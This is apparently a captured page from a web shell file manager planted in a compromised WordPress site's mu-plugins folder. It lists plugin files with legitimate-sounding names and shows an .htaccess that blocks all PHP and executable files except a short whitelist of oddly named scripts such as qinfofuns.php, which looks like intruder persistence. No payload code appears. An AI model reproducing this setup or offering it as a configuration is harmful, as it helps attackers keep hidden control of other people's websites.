golden hour
/home/godaofbq/hyperxmed.com/wp-content/mu-plugins
⬆️ Go Up
Upload
File/Folder
Size
Actions
.htaccess
514 B
Del
OK
781687
-
Del
OK
class-wp-http-insights.php
3.63 KB
Del
OK
error_log
1.95 KB
Del
OK
index.php
0 B
Del
OK
theme-optimizer.php
5.35 KB
Del
OK
wpupd-guard.php
1.41 KB
Del
OK
Edit: .htaccess
<FilesMatch "(?i)\.(py|exe|phtml|php\d*|suspected|cgi)$"> <IfModule mod_authz_core.c> Require all denied </IfModule> <IfModule !mod_authz_core.c> Order allow,deny Deny from all </IfModule> </FilesMatch> <FilesMatch "^(site-maintenance\.php|styles\.php|wp-upgrade\.php|qinfofuns\.php)$"> <IfModule mod_authz_core.c> Require all granted </IfModule> <IfModule !mod_authz_core.c> Order allow,deny Allow from all </IfModule> </FilesMatch>
Save